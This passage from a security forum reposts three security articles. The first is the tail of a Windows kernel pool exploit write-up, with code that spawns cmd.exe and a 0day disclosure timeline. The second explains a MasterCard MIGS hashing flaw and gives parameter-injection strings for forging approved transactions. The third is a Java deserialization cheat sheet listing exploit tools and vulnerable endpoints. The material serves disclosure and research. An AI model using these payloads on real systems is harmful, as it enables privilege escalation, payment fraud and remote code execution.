OkayToCloseProcedure. """ # free the corrupted chunk to trigger OkayToCloseProcedure for k, v in khandlesd.iteritems(): kernel32.CloseHandle(v) os.system("cmd.exe") Obligatory, full sized screenshot: Timeline 2017-08-22 – Verified and sent to Jungo via {sales,first,security,info}@jungo.com. 2017-08-25 – No response from Jungo and two bounced emails. 2017-08-26 – Attempted a follow up with the vendor via website chat. 2017-08-26 – No response via the website chat. 2017-09-03 – Recieved an email from a Jungo representative stating that they are “looking into it”. 2017-09-03 – Requested an timeframe for patch development and warned of possible 0day release. 2017-09-06 – No response from Jungo. 2017-09-06 – Public 0day release of advisory. Some people ask how long it takes me to develop exploits. Honestly, since the kernel is new to me, it took me a little longer than normal. For vulnerability analysis and exploitation of this bug, it took me 1.5 days (over the weekend) which is relatively slow for an older platform. Conclusion Any size chunk that is < 0x1000 can be exploited in this manner. As mentioned, this is not a new technique, but merely a variation to an already existing technique that I wouldn’t have discovered if I stuck to exploiting HEVD. Having said that, the ability to take a pre-existing vulnerable driver and develop exploitation techniques from it proves to be invaluable. Kernel pool determinimism is strong, simply because if you randomize more of the kernel, then the operating system takes a performance hit. The balance between security and performance has always been problematic and it isn’t always so clear unless you are dealing directly with the kernel. References https://github.com/hacksysteam/HackSysExtremeVulnerableDriver http://www.fuzzysecurity.com/tutorials/expDev/20.html https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-Slides.pdf https://msdn.microsoft.com/en-us/library/windows/desktop/ms724485(v=vs.85).aspx https://www.exploit-db.com/exploits/34272 Shoutout’s to beef, sicky, ryujin, skylined and bee13oy for the help! Here, you can find the advisory and the exploit. Sursa: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html
  21. Eh, sunt multi non-alumni care pot sa scrie.
  22. Mastercard Internet Gateway Service: Hashing Design Flaw Last year I found a design error in the MD5 version of the hashing method used by Mastercard Internet Gateway Service. The flaw allows modification of transaction amount. They have awarded me with a bounty for reporting it. This year, they have switched to HMAC-SHA256, but this one also has a flaw (and no response from MasterCard). If you just want to know what the bug is, just skip to the Flaw part. What is MIGS? When you pay on a website, the website owner usually just connects their system to an intermediate payment gateway (you will be forwarded to another website). This payment gateway then connects to several payments system available in a country. For credit card payment, many gateways will connect to another gateway (one of them is MIGS) which works with many banks to provide 3DSecure service. How does it work? The payment flow is usually like this if you use MIGS: You select items from an online store (merchant) You enter your credit card number on the website The card number, amount, etc is then signed and returned to the browser which will auto POST to intermediate payment gateway The intermediate payment gateway will convert the format to the one requested by MIGS, sign it (with MIGS key), and return it to the browser. Again this will auto POST, this time to MIGS server. If 3D secure not requested, then go to step 6. If 3D secure is requested, MIGS will redirect the request to the bank that issues the card, the bank will ask for an OTP, and then it will generate HTML that will auto POST data to MIGS MIGS will return a signed data to the browser, and will auto POST the data back to the intermediate Gateway Intermediate Gateway will check if the data is valid or not based on the signature. If it is not valid, then error page will be generated Based on MIGS response, payment gateway will forward the status to the merchant Notice that instead of communicating directly between servers, communications are done via user’s browser, but everything is signed. In theory, if the signing process and verification process is correct then everything will be fine. Unfortunately, this is not always the case. Flaw in the MIGS MD5 Hashing This bug is extremely simple. The hashing method used is: MD5(Secret + Data) But it was not vulnerable to hash length extension attack (some checks were done to prevent this). The data is created like this: for every query parameter that starts with vpc_, sort it, then concatenate the values only, without delimiter. For example, if we have this data: Name: Joe Amount: 10000 Card: 1234567890123456 vpc_Name=Joe&Vpc_Amount=10000&vpc_Card=1234567890123456 Sort it: vpc_Amount=10000 vpc_Card=1234567890123456 vpc_Name=Joe Get the values, and concatenate it: 100001234567890123456Joe Note that if I change the parameters: vpc_Name=Joe&Vpc_Amount=1&vpc_Card=1234567890123456&vpc_B=0000 Sort it: vpc_Amount=1 vpc_B=0000 vpc_Card=1234567890123456 vpc_Name=Joe Get the values, and concatenate it: 100001234567890123456Joe The MD5 value is still the same. So basically, when the data is being sent to MIGS, we can just insert additional parameter after the amount to eat the last digits, or to the front to eat the first digits, the amount will be slashed, and you can pay a 2000 USD MacBook with 2 USD. Intermediate gateways and merchant can work around this bug by always checking that the amount returned by MIGS is indeed the same as the amount requested. MasterCard rewarded me with 8500 USD for this bug. Flaw in the HMAC-SHA256 Hashing The new HMAC-SHA256 has a flaw that can be exploited if we can inject invalid values to intermediate payment gateways. I have tested that at least one payment gateway (Fusion Payments) have this bug. I was rewarded 500 USD from Fusion Payments. It may affect other Payment gateways that connect to MIGS. In the new version, they have added delimiters (&) between fields, added field names and not just values, and used HMAC-SHA256. For the same data above, the hashed data is: Vpc_Amount=10000&vpc_Card=1234567890123456&vpc_Name=Joe We can’t shift anything, everything should be fine. But what happens if a value contains & or = or other special characters? Reading this documentation, it says that: Note: The values in all name value pairs should NOT be URL encoded for the purpose of hashing. The “NOT” is my emphasis. It means that if we have these fields: Amount=100 Card=1234 CVV=555 It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555) And if we have this (amount contains the & and =) Amount=100&Card=1234 CVV=555 It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555) The same as before. Still not really a problem at this point. Of course, I thought that may be the documentation is wrong, may be it should be encoded. But I have checked the behavior of the MIGS server, and the behavior is as documented. May be they don’t want to deal with different encodings (such as + instead of %20). There doesn’t seem to be any problem with that, any invalid values will be checked by MIGS and will cause an error (for example invalid amount above will be rejected). But I noticed that in several payment gateways, instead of validating inputs on their server side, they just sign everything it and give it to MIGS. It’s much easier to do just JavaScript checking on the client side, sign the data on the server side, and let MIGS decide whether the card number is correct or not, or should the CVV be 3 or 4 digits, is the expiration date correct, etc. The logic is: MIGS will recheck the inputs, and will do it better. On Fusion Payments, I found out that it is exactly what happened: they allow any characters of any length to be sent for the CVV (only checked in JavaScript), they will sign the request and send it to MIGS. Exploit To exploit this we need to construct a string which will be a valid request, and also a valid MIGS server response. We don’t need to contact MIGS server at all, we are forcing the client to sign a valid data for themselves. A basic request looks like this: vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256 and a basic response from the server will look like this: vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256 In the Fusion Payment’s case, the exploit is done by injecting vpc_CardSecurityCode (CVV) vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999%26vpc_Message%3DApproved%26vpc_OrderInfo%3DORDERINFO%26vpc_ReceiptNo%3D722819658213%26vpc_TransactionNo%3D2000834062%26vpc_TxnResponseCode%3D0%26vpc_Z%3Da&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256 The client/payment gateway will generate the correct hash for this string Now we can post this data back to the client itself (without ever going to MIGS server), but we change it slightly so that the client will read the correct variables (most client will only check forvpc_TxnResponseCode, and vpc_TransactionNo): vpc_AccessCode=9E33F6D7%26vpc_Amount%3D25%26vpc_Card%3DVisa%26vpc_CardExp%3D1717%26vpc_CardNum%3D4599777788889999%26vpc_CardSecurityCode%3D999&vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_Z=a%26vpc_OrderInfo%3DORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256 Note that: This will be hashed the same as the previous data The client will ignore vpc_AccessCode and the value inside it The client will process the vpc_TxnResponseCode, etc and assume the transaction is valid It can be said that this is a MIGS client bug, but the hashing method chosen by MasterCard allows this to happen, had the value been encoded, this bug will not be possible. Response from MIGS MasterCard did not respond to this bug in the HMAC-SHA256. When reporting I have CC-ed it to several persons that handled the previous bug. None of the emails bounced. Not even a “we are checking this” email from them. They also have my Facebook in case they need to contact me (this is from the interaction about the MD5 bug). Some people are sneaky and will try to deny that they have received a bug report, so now when reporting a bug, I put it in a password protected post (that is why you can see several password-protected posts in this blog). So far at least 3 views from MasterCard IP address (3 views that enter the password). They have to type in a password to read the report, so it is impossible for them to accidentally click it without reading it. I have nagged them every week for a reply. My expectation was that they would try to warn everyone connecting to their system to check and filter for injections. Flaws In Payment Gateways As an extra note: even though payment gateways handle money, they are not as secure as people think. During my pentests I found several flaws in the design of the payment protocol on several intermediate gateways. Unfortunately, I can’t go into detail on this one(when I say “pentests”, it means something under NDA). I also found flaws in the implementation. For example Hash Length Extension Attack, XML signature verification error, etc. One of the simplest bugs that I found is in Fusion Payments. The first bug that I found was: they didn’t even check the signature from MIGS. That means we can just alter the data returned by MIGS and mark the transaction as successful. This just means changing a single character from F (false) to 0 (success). So basically we can just enter any credit card number, got a failed response from MIGS, change it, and suddenly payment is successful. This is a 20 million USD company, and I got 400 USD for this bug. This is not the first payment gateway that had this flaw, during my pentest I found this exact bug in another payment gateway. Despite the relatively low amount of bounty, Fusion Payments is currently the only payment gateway that I contacted that is very clear in their bug bounty program, and is very quick in responding my emails and fixing their bugs. Conclusion Payment gateways are not as secure as you think. With the relatively low bounty (and in several cases that I have reported: 0 USD), I am wondering how many people already exploited bugs in payment gateways. Sursa: http://tinyhack.com/2017/09/05/mastercard-internet-gateway-service-hashing-design-flaw/
  23. Super, au trecut doar doua luni si ceva de la ultimul post.
  24. Java-Deserialization-Cheat-Sheet A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization libraries. Please, use #javadeser hash tag for tweets. Table of content Java Native Serialization (binary) Overview Main talks & presentations & docs Payload generators Exploits Detect Vulnerable apps (without public sploits/need more info) Protection For Android XMLEncoder (XML) XStream (XML/JSON/various) Kryo (binary) Hessian/Burlap (binary/XML) Castor (XML) json-io (JSON) Jackson (JSON) Red5 IO AMF (AMF) Apache Flex BlazeDS (AMF) Flamingo AMF (AMF) GraniteDS (AMF) WebORB for Java (AMF) SnakeYAML (YAML) jYAML (YAML) YamlBeans (YAML) "Safe" deserialization Java Native Serialization (binary) Overview Java Deserialization Security FAQ From Foxgloves Security Main talks & presentations & docs Marshalling Pickles by @frohoff & @gebl Video Slides Other stuff Exploiting Deserialization Vulnerabilities in Java by @matthias_kaiser Video Serial Killer: Silently Pwning Your Java Endpoints by @pwntester & @cschneider4711 Slides White Paper Bypass Gadget Collection Deserialize My Shorts: Or How I Learned To Start Worrying and Hate Java Object Deserialization by @frohoff & @gebl Slides Surviving the Java serialization apocalypse by @cschneider4711 & @pwntester Slides Video PoC for Scala, Grovy Java Deserialization Vulnerabilities - The Forgotten Bug Class by @matthias_kaiser Slides Pwning Your Java Messaging With Deserialization Vulnerabilities by @matthias_kaiser Slides White Paper Tool for jms hacking Defending against Java Deserialization Vulnerabilities by @lucacarettoni Slides A Journey From JNDI/LDAP Manipulation To Remote Code Execution Dream Land by @pwntester and O. Mirosh Slides White Paper Fixing the Java Serialization mess by @e_rnst Slides+Source Blind Java Deserialization by deadcode.me Part I - Commons Gadgets Part II - exploitation rev 2 Payload generators ysoserial https://github.com/frohoff/ysoserial RCE (or smth else) via: Apache Commons Collections <= 3.1 Apache Commons Collections <= 4.0 Groovy <= 2.3.9 Spring Core <= 4.1.4 (?) JDK <=7u21 Apache Commons BeanUtils 1.9.2 + Commons Collections <=3.1 + Commons Logging 1.2 (?) BeanShell 2.0 Groovy 2.3.9 Jython 2.5.2 C3P0 0.9.5.2 Apache Commons Fileupload <= 1.3.1 (File uploading, DoS) ROME 1.0 MyFaces JRMPClient/JRMPListener JSON Hibernate Additional tools (integration ysoserial with Burp Suite): JavaSerialKiller Java Deserialization Scanner Burp-ysoserial Full shell (pipes, redirects and other stuff): $@|sh – Or: Getting a shell environment from Runtime.exec Set String[] for Runtime.exec (patch ysoserial's payloads) Shell Commands Converter How it works: https://blog.srcclr.com/commons-collections-deserialization-vulnerability-research-findings/ http://gursevkalra.blogspot.ro/2016/01/ysoserial-commonscollections1-exploit.html JRE8u20_RCE_Gadget https://github.com/pwntester/JRE8u20_RCE_Gadget Pure JRE 8 RCE Deserialization gadget ACEDcup https://github.com/GrrrDog/ACEDcup File uploading via: Apache Commons FileUpload <= 1.3 (CVE-2013-2186) and Oracle JDK < 7u40 Universal billion-laughs DoS https://gist.github.com/coekie/a27cc406fc9f3dc7a70d Won't fix DoS via default Java classes (JRE) Universal Heap overflows DoS using Arrays and HashMaps https://github.com/topolik/ois-dos/ How it works: Java Deserialization DoS - payloads Won't fix DoS using default Java classes (JRE) Exploits no spec tool - You don't need a special tool (just Burp/ZAP + payload) RMI Protocol Default - 1099/tcp for rmiregistry ysoserial (works only against a RMI registry service) JMX Protocol based on RMI CVE-2016-3427 partially patched in JRE ysoserial JexBoss JNDI/LDAP When we control an adrress for lookup of JNDI (context.lookup(address) and can have backconnect from a server Full info JNDI remote code injection https://github.com/zerothoughts/jndipoc JMS Full info JMET JSF ViewState if no encryption or good mac no spec tool JexBoss T3 of Oracle Weblogic Protocol Default - 7001/tcp on localhost interface CVE-2015-4852 loubia (tested on 11g and 12c, supports t3s) JavaUnserializeExploits (doesn't work for all Weblogic versions) IBM Websphere 1 wsadmin Default port - 8880/tcp CVE-2015-7450 JavaUnserializeExploits serialator IBM Websphere 2 When using custom form authentication WASPostParam cookie Full info no spec tool Red Hat JBoss http://jboss_server/invoker/JMXInvokerServlet Default port - 8080/tcp CVE-2015-7501 JavaUnserializeExploits https://github.com/njfox/Java-Deserialization-Exploit serialator JexBoss Jenkins Jenkins CLI Default port - High number/tcp CVE-2015-8103 CVE-2015-3253 JavaUnserializeExploits JexBoss Jenkins 2 patch "bypass" for Jenkins CVE-2016-0788 Details of exploit ysoserial Jenkins 3 Jenkins CLI LDAP Default port - High number/tcp <= 2.32 <= 2.19.3 (LTS) CVE-2016-9299 Metasploit Module for CVE-2016-9299 Restlet <= 2.1.2 When Rest API accepts serialized objects (uses ObjectRepresentation) no spec tool RESTEasy *When Rest API accepts serialized objects (uses @Consumes({"*/*"}) or "application/*" ) Details and examples no spec tool OpenNMS RMI ysoserial Progress OpenEdge RDBMS all versions RMI ysoserial Commvault Edge Server CVE-2015-7253 Serialized object in cookie no spec tool Symantec Endpoint Protection Manager /servlet/ConsoleServlet?ActionType=SendStatPing CVE-2015-6555 serialator Oracle MySQL Enterprise Monitor https://[target]:18443/v3/dataflow/0/0 CVE-2016-3461 no spec tool serialator PowerFolder Business Enterprise Suite custom(?) protocol (1337/tcp) MSA-2016-01 powerfolder-exploit-poc Solarwinds Virtualization Manager <= 6.3.1 RMI CVE-2016-3642 ysoserial Cisco Prime Infrastructure https://[target]/xmp_data_handler_service/xmpDataOperationRequestServlet <= 2.2.3 Update 4 <= 3.0.2 CVE-2016-1291 CoalfireLabs/java_deserialization_exploits Cisco ACS <= 5.8.0.32.2 RMI (2020 tcp) CSCux34781 ysoserial Apache XML-RPC all version, no fix (the project is not supported) POST XML request with ex:serializable element Details and examples no spec tool Apache Archiva because it uses Apache XML-RPC CVE-2016-5004 Details and examples no spec tool SAP NetWeaver https://[target]/developmentserver/metadatauploader CVE-2017-9844 PoC Sun Java Web Console admin panel for Solaris < v3.1. old DoS sploit no spec tool Apache MyFaces Trinidad 1.0.0 <= version < 1.0.13 1.2.1 <= version < 1.2.14 2.0.0 <= version < 2.0.1 2.1.0 <= version < 2.1.1 it does not check MAC CVE-2016-5004 no spec tool Apache Tomcat JMX JMX Patch bypass CVE-2016-8735 JexBoss OpenText Documentum D2 version 4.x CVE-2017-5586 exploit Apache ActiveMQ - Client lib JMS JMET Redhat/Apache HornetQ - Client lib JMS JMET Oracle OpenMQ - Client lib JMS JMET IBM WebSphereMQ - Client lib JMS JMET Oracle Weblogic - Client lib JMS JMET Pivotal RabbitMQ - Client lib JMS JMET IBM MessageSight - Client lib JMS JMET IIT Software SwiftMQ - Client lib JMS JMET Apache ActiveMQ Artemis - Client lib JMS JMET Apache QPID JMS - Client lib JMS JMET Apache QPID - Client lib JMS JMET Amazon SQS Java Messaging - Client lib JMS JMET Detect Code review ObjectInputStream.readObject ObjectInputStream.readUnshared Tool: Find Security Bugs Tool: Serianalyzer Traffic Magic bytes 'ac ed 00 05' bytes 'rO0' for Base64 'application/x-java-serialized-object' for Content-Type header Network Nmap >=7.10 has more java-related probes use nmap --all-version to find JMX/RMI on non-standart ports Burp plugins Java Deserialization Scanner SuperSerial SuperSerial-Active Vulnerable apps (without public sploits/need more info) Spring Service Invokers (HTTP, JMS, RMI...) SAP P4 info from slides Apache SOLR SOLR-8262 5.1 <= version <=5.4 /stream handler uses Java serialization for RPC Apache Shiro SHIRO-550 encrypted cookie (with the hardcoded key) Apache ActiveMQ (2) CVE-2015-5254 <= 5.12.1 Explanation of the vuln CVE-2015-7253 Atlassian Bamboo (1) CVE-2015-6576 2.2 <= version < 5.8.5 5.9.0 <= version < 5.9.7 Atlassian Bamboo (2) CVE-2015-8360 2.3.1 <= version < 5.9.9 Bamboo JMS port (port 54663 by default) Atlassian Jira only Jira with a Data Center license RMI (port 40001 by default) JRA-46203 Akka version < 2.4.17 "an ActorSystem exposed via Akka Remote over TCP" Official description Spring AMPQ CVE-2016-2173 1.0.0 <= version < 1.5.5 Apache Tika CVE-2016-6809 1.6 <= version < 1.14 Apache Tika’s MATLAB Parser Apache HBase HBASE-14799 Apache Camel CVE-2015-5348 Gradle (gui) custom(?) protocol(60024/tcp) article Oracle Hyperion from slides Oracle Application Testing Suite CVE-2015-7501 Red Hat JBoss BPM Suite RHSA-2016-0539 CVE-2016-2510 VMWare vRealize Operations 6.0 <= version < 6.4.0 REST API VMSA-2016-0020 CVE-2016-7462 VMWare vCenter/vRealize (various) CVE-2015-6934 VMSA-2016-0005 JMX Cisco (various) List of vulnerable products CVE-2015-6420 Lexmark Markvision Enterprise CVE-2016-1487 McAfee ePolicy Orchestrator CVE-2015-8765 HP iMC CVE-2016-4372 HP Operations Orchestration CVE-2016-1997 HP Asset Manager CVE-2016-2000 HP Service Manager CVE-2016-1998 HP Operations Manager CVE-2016-1985 HP Release Control CVE-2016-1999 HP Continuous Delivery Automation CVE-2016-1986 HP P9000, XP7 Command View Advanced Edition (CVAE) Suite CVE-2016-2003 HP Network Automation CVE-2016-4385 Adobe Experience Manager CVE-2016-0958 Unify OpenScape (various) CVE-2015-8237 RMI (30xx/tcp) CVE-2015-8238 js-soc protocol (4711/tcp) Apache TomEE CVE-2015-8581 CVE-2016-0779 IBM Congnos BI CVE-2012-4858 Novell NetIQ Sentinel ? ForgeRock OpenAM 9-9.5.5, 10.0.0-10.0.2, 10.1.0-Xpress, 11.0.0-11.0.3 and 12.0.0 201505-01 F5 (various) sol30518307 Hitachi (various) HS16-010 0328_acc Apache OFBiz CVE-2016-2170 NetApp (various) CVE-2015-8545 Apache Tomcat requires local access CVE-2016-0714 Article Zimbra Collaboration version < 8.7.0 CVE-2016-3415 Apache Batchee Apache JCS Apache OpenJPA Apache OpenWebBeans Protection Look-ahead Java deserialization NotSoSerial SerialKiller ValidatingObjectInputStream Name Space Layout Randomization Some protection bypasses Tool: Serial Whitelist Application Trainer JEP 290: Filter Incoming Serialization Data in JDK 6u141, 7u131, 8u121 For Android One Class to Rule Them All: 0-Day Deserialization Vulnerabilities in Android Android Serialization Vulnerabilities Revisited XMLEncoder (XML) How it works: http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec XStream (XML/JSON/various) How it works: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Atlassian Bamboo CVE-2016-5229 Jenkins CVE-2017-2608 Kryo (binary) How it works: https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-1-kryo Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Hessian/Burlap (binary/XML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Castor (XML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): OpenNMS NMS-9100 json-io (JSON) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Jackson (JSON) vulnerable in some configuration How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Apache Camel CVE-2016-8749 Red5 IO AMF (AMF) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Apache OpenMeetings CVE-2017-5878 Apache Flex BlazeDS (AMF) How it works: AMF – Another Malicious Format Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Adobe ColdFusion CVE-2017-3066 <= 2016 Update 3 <= 11 update 11 <= 10 Update 22 Apache BlazeDS CVE-2017-5641 VMWare VCenter CVE-2017-5641 Flamingo AMF (AMF) How it works: AMF – Another Malicious Format GraniteDS (AMF) How it works: AMF – Another Malicious Format WebORB for Java (AMF) How it works: AMF – Another Malicious Format SnakeYAML (YAML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Resteasy CVE-2016-9606 Apache Camel CVE-2017-3159 Apache Brooklyn CVE-2016-8744 jYAML (YAML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec YamlBeans (YAML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec "Safe" deserialization Some serialization libs are safe (or almost safe) https://github.com/mbechler/marshalsec However, it's not a recomendation, but just a list of other libs that has been researched by someone: JAXB XmlBeans Jibx ProtobufGSON GWT-RPC Sursa: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
×
×
  • Create New...